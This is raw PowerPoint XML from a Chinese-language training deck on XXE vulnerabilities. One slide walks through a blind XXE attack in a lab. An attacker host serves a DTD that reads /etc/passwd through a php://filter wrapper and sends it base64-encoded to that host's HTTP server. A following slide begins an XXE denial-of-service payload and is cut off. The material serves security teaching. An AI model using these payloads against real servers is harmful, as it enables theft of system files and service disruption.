            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669773" y="7120478"/>
            <a:ext cx="14908211" cy="3604672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906802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漏洞实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26BF521-100F-25D9-1E64-75CDF8D35C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2567468"/>
            <a:ext cx="21945600" cy="972573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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>无回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器日志回显</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这里通过服务器请求包的信息来查看并读取文件。先准备测试环境，我靶场机所在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>192.168.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，然后使用攻击服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>192.168.0.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开启一个简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务，在桌面打开终端输入下面命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>python3 -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击服务器上新建文一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xxe.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件写入下面内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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file SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://filter/read=convert.base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-encode/resource=file:///etc/passwd"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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;#37;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> send SYSTEM 'http://192.168.0.11?c=%file;’&gt;”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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攻击机上使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</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convert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a: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remote SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://192.168.0.11/xxe.dtd"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569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%remote;%int;%send;</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a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在提交数据后页面是什么都没有显示的，回到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器上，可以看到刚刚提交数据的请求包信息，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xxe.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>里面的内容被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密后所外带显示出来了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>c=d2VsY29tZQ==, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将改内容进行解密即可得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件的内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3896075A-1312-B46C-1AD6-EACE47B0CBD7}"/>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5525750" y="2662718"/>
            <a:ext cx="6667500" cy="4781550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B67823B-E34D-0A21-1E02-4C03C907BE83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17220269" y="7482368"/>
            <a:ext cx="3278462" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>无回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="pingfang SC"/>
              </a:rPr>
              <a:t>测试原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7450580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漏洞实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26BF521-100F-25D9-1E64-75CDF8D35C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2567468"/>
            <a:ext cx="21945600" cy="7602081"/>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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经典的用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件样例如下，原理为构造恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实体文件耗尽可用内存，因为许多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器在解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档时倾向于将它的整个结构保留在内存中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这个在其他编程语言或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JDK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>版本较低的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中可利用，但在高版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JDK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的环境中会报错中断解析：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"1.0"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOCTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "http://vps/dos.dtd" [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ELEMENT data (#PCDATA)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" sz="2400" b="0" dirty="0">
